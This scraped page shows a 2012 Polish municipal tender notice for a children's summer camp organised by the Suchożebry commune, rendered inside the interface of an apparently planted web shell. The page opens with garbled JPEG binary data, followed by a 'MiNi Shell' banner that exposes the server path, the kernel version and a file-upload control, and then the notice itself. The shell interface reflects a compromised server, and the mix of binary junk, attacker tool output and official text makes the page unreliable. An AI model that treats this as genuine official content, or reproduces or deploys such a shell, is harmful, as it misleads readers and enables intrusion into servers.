JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120507/100295-N-2012.html

<p class="kh_header"><b>Suchożebry: Zorganizowanie kolonii letnich dla dzieci w wieku od 7 do 13 lat w ramach projektu Szansa dla dzieci ze szkoły w Krześlinie</b><br>
<b>Numer ogłoszenia: 100295 - 2012; data zamieszczenia: 07.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchożebry , ul. Aleksandry Ogińskiej 11, 08-125 Suchożebry, woj. mazowieckie, tel. 0-25 63 145 15, faks 0-25 63 145 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie kolonii letnich dla dzieci w wieku od 7 do 13 lat w ramach projektu Szansa dla dzieci ze szkoły w Krześlinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem postępowania jest  usługa  pn:  Zorganizowanie kolonii letnich dla dzieci w wieku od 7 do 13 lat w ramach projektu Szansa dla dzieci ze szkoły w Krześlinie,  w tym:
A) CZĘŚĆ I - Organizacja turnusu  kolonii letnich w górach. 
B) CZĘŚĆ II - Realizacja zadań kierownika turnusu. 
C) CZĘŚĆ III Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego. 
D) CZĘŚĆ IV Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego. 
E) CZĘŚĆ V Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego. 
D) CZĘŚĆ VI Realizacja zajęć opiekuńczych podczas turnusu wakacyjnego. 
Szczególowo opisane w załaczniku do niniejszego Ogłoszenia pn: ZAŁĄCZNIK I  - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 63.50.00.00-4, 92.00.00.00-1, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta Wykonawcy będzie zawierać: a) wypełniony formularz ofertowy (zał. 1), b) dokumenty i oświadczenia wymienione w pkt. VII niniejszej Specyfikacji. c) zaparafowany przez Wykonawcę egzemplarz Załącznika nr 4a/4b SIWZ pn. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego- stosownie do zadania/ zadań na które Wykonawca składa ofertę. d) pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, (jeśli dotyczy); e) Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę f) Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający z zastrzeżeniem p. 2. dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a) w uzasadnionych przypadkach lub innych okolicznościach niezależnych od Zamawiającego lub Wykonawcy konieczna będzie zmiana terminu realizacji zamówienia, Zamawiający na wniosek Wykonawcy może przedłużyć termin realizacji zamówienia. Okolicznościami takimi będą: niesprzyjające warunki atmosferyczne, siła wyższa, awarie, katastrofy, akty wandalizmu,
b) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, 
c) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany wynikły w trakcie realizacji zamówienia, Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu umowy w następujących przypadkach:
-  zawieszenie wykonywania usług przez Zamawiającego
d) zmiany postanowień umowy następuje w formie pisemnej pod rygorem nieważności.
2. Zmiany dotyczące wydłużenia terminu realizacji zamówienia (wykonania umowy), będą możliwe jedynie w przypadku gdy Zamawiający uzyska zgodę Instytucji Wdrażającej Programu Operacyjnego Kapitał Ludzki na lata  2007-2013  na wydłużenie terminu realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.suchozebry.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Suchożebry ul. A. Ogińskiej 11, 08-125 Suchożebry Cena 30,00zł + koszt przesyłki za pobraniem (jeśli dotyczy).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2012 godzina 10:00, miejsce: Urząd Gminy Suchożebry ul. A. Ogińskiej 11, 08-125 Suchożebry (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013r Priorytet. IX. Rozwój wykształcenia i kompetencji w regionach, działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I - Organizacja turnusu  kolonii letnich w górach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z poniższymi wymaganiami:
a) Przedmiotem zamówienia jest zorganizowanie kolonii letnich w okresie lipiec-do 10 sierpnia  2012 roku dla 40 uczniów dla dzieci Szkoły Podstawowej w Krześlinie, w wieku od 7 do 13 lat oraz 4 opiekunów i 1 kierownika, zgodnie z przepisami Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U.nr 218 poz. 1696) zmieniające rozporządzenie w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania. 
b) Miejsce pobytu, Polska: województwo śląskie, powiat bielski, obiekt: 
1) w miejscowości  w górach 
2)teren ośrodka powinien być usytuowany z dala od dróg o dużym natężeniu ruchu oraz od torów kolejowych, tj. w odległości nie mniejszej niż 500 m i musi być ogrodzony, oświetlony i strzeżony. Ośrodek, w którym będzie zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i Ochronie Środowiska.
Organizator wypoczynku zapewnia możliwość korzystania z kąpieliska spełniającego wymogi bezpieczeństwa i czystości wody oraz opiekę ratowników podczas kąpieli. Wykonawca zobowiązany jest do zapewnienia warunków bezpieczeństwa uczestników kolonii, a w szczególności podczas kąpieli.
Uwaga! Zamawiający nie wyraża zgody na zakwaterowanie uczestników w namiotach, domkach campingowych, pawilonach. 
3) zakwaterowanie dzieci, kadry wychowawców i kierownika w jednym budynku (w rozumieniu przepisów ustawy Prawo budowlane), z pełnym węzłem sanitarnym (natrysk, umywalka i wc ), 
4) w pokojach dzieci maksymalnie 5 łóżek, z wyłączeniem łóżek piętrowych i tzw. dostawek, 
5) pokoje ze standardowym wyposażeniem (co najmniej: szafka nocna przy każdym łóżku - tapczaniku, szafa, stół, krzesła w ilości odpowiadającej ilości dzieci w pokoju, 
6) pokoje i łazienki muszą być estetyczne i czyste, 
7) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach, na każdej z nich musi znajdować się pokój wychowawców, 
8) co najmniej jedna łazienka (natrysk, umywalki i wc) na cztery pokoje. Ciepła woda bez ograniczeń, 
9) na terenie ośrodka powinna znajdować się stołówka, 
10) na terenie ośrodka bądź w jego najbliższej okolicy powinien znajdować się ogólnie dostępny telefon na kartę magnetyczną/chipową, 
11) ośrodek musi dysponować: a) salą dyskotekową ze sprzętem dyskotekowym, b) świetlicą wyposażoną w stoliki i krzesła, gry planszowe, układanki itp., TV c) wokół obiektu teren sportowo - rekreacyjny, d) dysponować drobnym sprzętem sportowym (np.: piłki do gier zespołowych, sprzęt do badmintona, stół z rakietkami do tenisa stołowego, itp.), e) izolatką, oddzielna dla dziewcząt i chłopców, f) salą przystosowaną do prowadzenia zajęć, g) pomieszczeniem  do suszenia odzieży oraz sprzętem do prasowania 
12) Wykonawca zapewni nieodpłatną dostępność wymienionych w pkt 11 obiektów i sprzętów. Uwaga! Zamawiający przed podpisaniem umowy z wybranym wykonawcą zastrzega sobie prawo kontroli obiektu. Placówka zatwierdzona przez Kuratorium Oświaty - zgodnie z przepisami MEN. Na 14 dni przed przewozem uczestników wykonawca zobowiązany jest do przedstawienia zaświadczenia wydanego przez kuratora oświaty właściwego dla miejsca zlokalizowania placówki wypoczynkowej o jej zarejestrowaniu

c) Ilość i czas trwania turnusów: 
1) wypoczynek dla dzieci ma być zorganizowany w formie jednego turnusu, 
2) czas trwania turnusu od daty wyjazdu do daty przyjazdu- 14 dni, tj 14 dób (13 noclegów).
d) Liczba uczestników kolonii: Uczestnikami kolonii będą dzieci Szkoły Podstawowej w Krześlinie w wieku 7 - 13 lat, ogółem 40 dzieci. Zamawiający we własnym zakresie zorganizuje nabór uczestników kolonii. Lista uczestników kolonii przekazywana będzie Wykonawcy zamówienia na 7 dni przed planowanym turnusem. Zamawiający we własnym zakresie zorganizuje nabór wychowawców i kierownika kolonii. Lista i informacja o  dokumentach zostaną przekazane na 3 tygodnie przed terminem kolonii.
e) Wymogi dotyczące wyżywienia: 
1) 4 (cztery) posiłki dziennie: śniadanie, obiad - składający się z dwóch ciepłych dań, podwieczorek i kolacja, 
2)zapewnienie obiadu oraz suchego prowiantu na drogę powrotną z miejsca pobytu do Krześlina  oraz podczas całodniowych wycieczek zaplanowanych w programie ramowym kolonii, 
3)dzieci muszą mieć stały dostęp do napoi - w stołówce lub na korytarzu przed stołówką Wykonawca udostępni przez całą dobę zimne napoje, kompot bądź herbatę, 
4)posiłki winny być urozmaicone, odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, bogatych w witaminy, owoce i warzywa, Niedopuszczalne jest podawanie posiłków w formie szwedzkiego stołu 
5)turnus rozpoczyna się obiadem dwudaniowym w pierwszym dniu pobytu i kończy się śniadaniem w ostatnim dniu pobytu. 
f) Transport: 
1) transport zapewnia Wykonawca, 
2)transport autokarowy z klimatyzacją na trasie: Szkoła Podstawowa w Krześlinie - obiekt, obiekt - Szkoła Podstawowa w Krześlinie, 
3)pojazd musi być sprawny z aktualnym przeglądem technicznym, obsługa dwóch kierowców. Autokar musi być wyposażony w dostateczną liczbę miejsc siedzących zgodnie z liczbą przewożonych uczestników, 
4)dokładne godziny wyjazdu i powrotu autokaru ustalone zostaną w późniejszym okresie, 
5)Zamawiający wyklucza przewóz dzieci autokarami w godzinach nocnych tzn. między godz. 22.00 a 6.00. 
6)Koszty ubezpieczenie autokaru i dzieci podczas przejazdu pokrywa Wykonawca. 
7)Zamawiający zastrzega sobie prawo powiadomienia Policji w celu kontroli pojazdu przed wyjazdem dzieci na kolonie oraz przed powrotem z kolonii 
8) w przypadku awarii autokaru wykonawca zapewnia zastępczy na własny koszt, do grupy podczas transportu nie może być dołączona inna grupa, 
g). Ubezpieczenie: 
1)Wykonawca zapewnia ubezpieczenie uczestników i kadry od następstw nieszczęśliwych wypadków i kosztów leczenia, 
2)ubezpieczenie obejmuje okres od momentu przekazania dzieci pod opiekę wychowawców z miejsca zbiórki Szkoła Podstawowa w Krześlinie, do momentu odebrania dzieci przez opiekunów/ rodziców przy Szkole Podstawowej w Krześlinie, 
3)Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników kolonii w trakcie podróży oraz podczas pobytu dziecka w ośrodku, 
4)Wykonawca zobowiązany jest do posiadania ubezpieczenia OC. 
h) Wymagana obecność przedstawiciela Wykonawcy w dniu wyjazdu  turnusu,
i) Opieka:  Na turnusie Wykonawca zapewnia: 
1)kierownika obiektu, 
2) pilota wycieczek, 
3) przewodników na wycieczkach 
4)przewodników w górach
5)autokar 
6)bezpłatną opiekę medyczną lekarsko - pielęgniarską, tj. pielęgniarka obecna w ośrodku 24 godziny na dobę, lekarz pierwszego kontaktu na gotowość 24 godziny na dobę, zakup lekarstw i materiałów opatrunkowych dla dzieci w trakcie trwania kolonii w ramach kosztów Wykonawcy, 
7) opiekę ratownika, 
8) obsługę sprzątająco - porządkową dla utrzymania czystości w całym obiekcie oraz w jego okolicy. 
j) Pozostałe wymagania: Wykonawca przedstawi: 
1) pisemny program kolonii na każdy dzień pobytu zapewniający właściwą organizację zajęć z dziećmi (zajęcia sportowe, świetlicowe, krajoznawcze, kulturalne itp.), 
2) Przed zawarciem umowy wykonawca przedłoży  propozycje wycieczek do wyboru Zamawiającego. Program wycieczek musi być przed zawarciem umowy uzgodniony i zaakceptowany przez Zamawiającego. Wykonawca zapewnieni obsługę licencjonowanego przewodnika na wycieczkach, pilota, licencjonowanego przewodnika górskiego  oraz bezpłatny wstęp dzieci do zwiedzanych w czasie wycieczek obiektów. Zamawiający zastrzega sobie realizację wycieczek autokarowych po terenie Polski: powinny obejmować miejscowości atrakcyjne pod względem przyrodniczym i historycznym  Wisła( w ciągu 3 dni: min   Dziki zachód dla grup zorganizowanych, Dom zdrojowy i figura Adama Małysza z białej czekolady, przejażdżka ciuchcią, galeria sportowa Małysza, Zamek Prezydenta z wycieczką po Wiśle, Muzeum narciarstwa, wjazd wyciągiem na skocznię Małysza, mała i duża zapora, kaskady Rodła-wodospady, Pętla Cieńkowska , Park wodny Tropikalna), Rabka Zdrój - Rabkoland: Muzeum orderu uśmiechu, Muzeum rekordów i osobliwości, wstęp na  urządzenia dla dzieci  dostosowane do wieku Bielsko Biała - Apteka pod jeleniem, Muzeum techniki i włókiennictwa, Dom pod żabami,stary rynek, mury obronne Istebna-Izba pamięci Jerzego Kukuczki, Izba regionalna w chacie Jana Kawuloka, Ośrodek Edukacji ekologicznej, park linowy -dostosowany do wieku dzieci, Żywiec-rynek, kościół katedralny, zamek, jezioro Żywieckie, kąpielisko, Szczyrk-sanktuarium, galeria sztuki. Jak również 2 wycieczki autokarowe poza granice kraju, jedną na Słowację  Liptovsky Mikulasz-zapora wodna, jaskinia, wjazd  wyciągiem Chopok. Druga do Czech -Oułomuniec Rynek Dolny i Górny, kolumna św. Trójcy , wyjście na wieżę ratuszową.- kościół św. Maurycego, kaplica św. Jana Sarkandrapark (Bezrucovy sady).
Organizator w zakresie zorganizowanych kolonii ma obowiązek przygotować: 
a)	co najmniej cztery dyskoteki;
b)	co najmniej dwa ogniska połączone z pieczeniem kiełbasek;
c)	zawody sportowe z nagrodami: turniej tenisa stołowego, siatkówki, piłki nożnej itp.
d)	co najmniej dwie piesze wycieczki po górach(dostosowany szlak do wieku dzieci) z przewodnikiem;
e)	co najmniej trzykrotne korzystanie z kąpieliska (bezpłatnego dla uczestników kolonii);
 3)  Wykonawca przedstawi sprawozdanie merytoryczne z realizacji programu kolonii w ciągu 14 dni od dnia zakończenia kolonii, 
4) Wykonawca zapewni artykuły (bloki, kredki, farby, długopisy, plastelina , modelina, wycinanki, nożyczki itp.)niezbędne do prowadzenia zajęć dla każdego uczestnika)oraz nagrody rzeczowe(drobny sprzęt sportowy, gadżety) i dyplomy dla uczestników kolonii za udział w konkursach i zabawach. Wykonawca będzie ściśle współpracował z kierownikiem kolonii.
5) Podczas wycieczek nocleg powinien być zapewniony w takiej miejscowości, aby trasy przejazdów wycieczek autokarowych w kraju były jak najkrótsze do 100km.
6) Poza osobami wymienionymi w p. a) Zamawiający przydziela swojego przedstawiciela pełniącego nadzór nad realizacją programu wypoczynku zgodnie z umową, który ma prawo do: pobytu w ośrodku wypoczynkowym na koszt Wykonawcy, sprawdzania warunków socjalno-bytowych, pisemnego potwierdzenia wykonanych usług, stanowiącego podstawę do zapłaty faktury (dojazd/powrót razem z całą grupą na koszt Wykonawcy). 
Zamawiający zapewni dzienniki zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 92.00.00.00-1, 55.24.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II - Realizacja zadań kierownika turnusu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z poniższymi wymaganiami:
